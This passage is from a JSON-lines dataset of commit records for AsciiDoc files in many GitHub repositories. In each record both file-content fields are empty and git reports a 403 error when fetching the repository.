2016-03-23-Test.adoc","repos":"scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io,scholzi94\/scholzi94.github.io","old_file":"_posts\/2016-03-23-Test.adoc","new_file":"_posts\/2016-03-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzi94\/scholzi94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1465a207376931bbfd6ac2b19feccd3a449e82","subject":"Update 2013-12-16-Eclipse-Tester-Java-8.adoc","message":"Update 2013-12-16-Eclipse-Tester-Java-8.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-12-16-Eclipse-Tester-Java-8.adoc","new_file":"_posts\/2013-12-16-Eclipse-Tester-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85ec14a30f584374c4871152d375b39874ac1c1c","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c1257c57ae7c98eee35ba15f8989c3e1674e1ac","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dbef326813c5fbe57a57da365bc1d5dcfd1e100","subject":"doc(README): add chinese version","message":"doc(README): add chinese version\n","repos":"dan-blanchard\/blog,dan-blanchard\/blog,dan-blanchard\/blog","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dan-blanchard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6535b6108b5ed27e56a45d686d8799f40b21b3","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"matthewtckr\/zendesk-java-client,cloudbees\/zendesk-java-client,norrisjeremy\/zendesk-java-client,christ66\/zendesk-java-client,ydubreuil\/zendesk-java-client,kuisathaverat\/zendesk-java-client,jon-ruckwood\/zendesk-java-client,gvh1234\/zendesk-java-client","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudbees\/zendesk-java-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b25bef84d426d64756c0f5a972ca350c31ab6fd","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5671e87f4d72f15a547a3776fe5b38784e61368","subject":"Minor update","message":"Minor update\n","repos":"dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook","old_file":"packer\/base-centos\/README.adoc","new_file":"packer\/base-centos\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dedickinson\/engineering-notebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"683a797994cbf91175c1de6442c7c7ac5ea12a2b","subject":"Azure guide for Quarkus Native applications in Docker containers (#3199)","message":"Azure guide for Quarkus Native applications in Docker containers (#3199)\n\nAdd Azure guide for Quarkus ","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/azure-cloud-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/azure-cloud-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6548c024d84f9042e174144be455eeaa623f1498","subject":"Update data_sets.adoc","message":"Update data_sets.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d9d6aecff686af25ad897f7357243111223db3d","subject":"Fix license badge","message":"Fix license badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bb299f6dd929ffb06e38f9939de3ac92424756e","subject":"Update 2017-07-18-Makes-You-Winder.adoc","message":"Update 2017-07-18-Makes-You-Winder.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-07-18-Makes-You-Winder.adoc","new_file":"_posts\/2017-07-18-Makes-You-Winder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d721b84b9fdd920891f65e30a3c4af99376c7ae2","subject":"Add documentation","message":"Add documentation\n","repos":"cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cescoffier\/vertx-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2930f8f7be027b2289d539a823af235099c5934","subject":"Add README in AsciiDoc","message":"Add README in AsciiDoc\n","repos":"myokoym\/play-with-tmlib.js","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/myokoym\/play-with-tmlib.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ca85d40c20d9d60fcb352ec17415ad881f6cb85","subject":"y2b create post JBL Flip Unboxing \\u0026 Test (Wireless Bluetooth Speaker)","message":"y2b create post JBL Flip Unboxing \\u0026 Test (Wireless Bluetooth Speaker)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-22-JBL-Flip-Unboxing-u0026-Test-Wireless-Bluetooth-Speaker.adoc","new_file":"_posts\/2012-11-22-JBL-Flip-Unboxing-u0026-Test-Wireless-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d672b69ddc2653c528e24ac66e54471cd3f3f9","subject":"y2b create post Giant Multi-Touch Production Surface! (Emulator - Smithson Martin)","message":"y2b create post Giant Multi-Touch Production Surface! (Emulator - Smithson Martin)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-03-Giant-MultiTouch-Production-Surface-Emulator--Smithson-Martin.adoc","new_file":"_posts\/2014-01-03-Giant-MultiTouch-Production-Surface-Emulator--Smithson-Martin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b87768ff4cfc0df3eefa3bc34b0afc9f7e4bbf","subject":"Next about try. ","message":"Next about try. ","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"about\/about.adoc","new_file":"about\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ee53ca12ec25c601bdbcd31554ed65f04c948df","subject":"Update 2017-05-20.adoc","message":"Update 2017-05-20.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20.adoc","new_file":"_posts\/2017-05-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1159f7bfa43359389f5168a69565d7937123ea54","subject":"[DOCS] Fix update snapshot API description (elastic\/x-pack-elasticsearch#2089)","message":"[DOCS] Fix update snapshot API description (elastic\/x-pack-elasticsearch#2089)\n\nOriginal commit: elastic\/x-pack-elasticsearch@3d98bfad3fd957dfdd912de4679148557250a535\n","repos":"nknize\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/update-snapshot.asciidoc","new_file":"docs\/en\/rest-api\/ml\/update-snapshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3c49e4c1827f07d57f8d0ce44762d44d02c0903","subject":"Moving compile and flash STMboard wiki to be a guide","message":"Moving compile and flash STMboard wiki to be a guide\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Compile-and-Flash-STMBoard-Guide\/README.adoc","new_file":"Compile-and-Flash-STMBoard-Guide\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6619a86249f62d0712072f5a0a51ec90615528e7","subject":"y2b create post iPad Air Unboxing + First Impressions [Launch Day Unboxing]","message":"y2b create post iPad Air Unboxing + First Impressions [Launch Day Unboxing]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-01-iPad-Air-Unboxing--First-Impressions-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-11-01-iPad-Air-Unboxing--First-Impressions-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c97813f8495ad1b57cd51eee1a6640ee2eddcf8","subject":"Initial upload of captain's_log.asciidoc","message":"Initial upload of captain's_log.asciidoc\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a10829a34aa0478480018905bf2bbca7feab6589","subject":"y2b create post \u53ea\u5229\u7528 Android Pay \u5ea6\u904e24\u5c0f\u6642","message":"y2b create post \u53ea\u5229\u7528 Android Pay \u5ea6\u904e24\u5c0f\u6642","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-08--Android-Pay-24.adoc","new_file":"_posts\/2016-10-08--Android-Pay-24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21fa2d91cd9f1088388aec14fedd273d4d19af31","subject":"Delete 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","message":"Delete 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f480a84ec84d63d494807e8a2b05741eec896b4c","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efca6cd0fa6032bdcdfc2904021a9508bfe41cd8","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post The Mind Blowing 33 Million Pixel Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-TheMindBlowing33MillionPixelDisplay.adoc","new_file":"_posts\/2018-01-26-TheMindBlowing33MillionPixelDisplay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5d5e5ff0743019ac7d0463922ac977b5429e569","subject":"Updated MacOS keychain database file format documentation (#9)","message":"Updated MacOS keychain database file format documentation (#9)\n\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/MacOS keychain database file format.asciidoc","new_file":"documentation\/MacOS keychain database file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13be0360a50e55bf5051fb5036803432a07ca1ea","subject":"Update 2016-10-15-Teste-3.adoc","message":"Update 2016-10-15-Teste-3.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-15-Teste-3.adoc","new_file":"_posts\/2016-10-15-Teste-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b74eea1bf32e5a0b5756540f7fc9cb4d0f321d92","subject":"Update 2018-01-20-Bitrise.adoc","message":"Update 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ca5153c472e9094084887cb68465ef36374496","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd5bd1b0a98f476d683241c0d9bdb16a5cf57a6","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29b285664d31d5406f389337f67e6260d3a9f35a","subject":"KUDU-1139 Point to two Kudu source files which show M\/R integration","message":"KUDU-1139 Point to two Kudu source files which show M\/R integration\n\nThis is a first pass, and will hopefully be superseded by Ted's work on KUDU-983\n\nChange-Id: Iff915475340e9fcbe4bb16609706c4c1ac333533\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/8288\nTested-by: jenkins\nReviewed-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0241598da28521b06b3d438b3960f80dd2195c8f","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09125730dcb1deaa637aba161558069c72344d5c","subject":"Create tutorial.adoc","message":"Create tutorial.adoc\n\nAdding the full full tutorial on NLP-based analysis of literary texts using the DDW.","repos":"stefanpernes\/DARIAH-DKPro-Wrapper","old_file":"doc\/tutorial.adoc","new_file":"doc\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stefanpernes\/DARIAH-DKPro-Wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91632d3789c4dadcfbd779854a7e64cb88432111","subject":"y2b create post The Smartphone For Superheroes...","message":"y2b create post The Smartphone For Superheroes...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-02-The-Smartphone-For-Superheroes.adoc","new_file":"_posts\/2017-12-02-The-Smartphone-For-Superheroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47ac6b3e3fabf52ef4e4cafa8f19819b7305f675","subject":"Fix broken Google C++ Style Guide link","message":"Fix broken Google C++ Style Guide link\n\nChange-Id: Ieb98122b9b086c34c7d8e5fa95c73a914b173f56\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3075\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4fa10ffe88683ffb485dcc631db11bc3ada92a4","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0434660175ddd65cf3496913abb87f3a8a9d419c","subject":"Update 2015-10-31-The-Lost-Days.adoc","message":"Update 2015-10-31-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ded665871f05b83ef6217eba36b4595fdd23b54","subject":"adding link to #344","message":"adding link to #344\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3347606d47ec0d15418029061c2d7d78ed878da0","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3081d3fc4862d59dbafb314cc2a90ebda427d21","subject":"Publish 2016-7-2-easywechat.adoc","message":"Publish 2016-7-2-easywechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-easywechat.adoc","new_file":"2016-7-2-easywechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf0ca1e3251ad1d74afde39f175de5e76aaad47","subject":"Delete the file at '_posts\/2012-12-1-Frisbeens-historie.adoc'","message":"Delete the file at '_posts\/2012-12-1-Frisbeens-historie.adoc'","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec5da570b9dfc7cb81ffd2cb6fd9bdd38edf870e","subject":"Instructions for Download","message":"Instructions for Download\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/download.adoc","new_file":"lab\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 